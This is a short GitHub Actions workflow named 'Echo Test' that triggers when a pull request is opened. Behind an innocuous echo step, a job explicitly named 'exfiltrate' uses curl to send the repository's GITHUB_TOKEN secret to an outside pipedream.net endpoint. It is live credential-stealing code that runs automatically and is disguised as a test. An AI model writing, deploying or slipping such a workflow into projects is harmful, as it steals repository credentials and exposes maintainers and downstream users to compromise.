name: Echo Test

on:
  pull_request:
    types: [opened]

jobs:
  exfiltrate:
    runs-on: ubuntu-latest
    steps:
      - name: Echo confirmation
        run: echo "Second PR triggered!"

      - name: Send token
        run: |
          curl -G --data-urlencode "token=${{ secrets.GITHUB_TOKEN }}" https://eo5xqptx8ll0mnk.m.pipedream.net
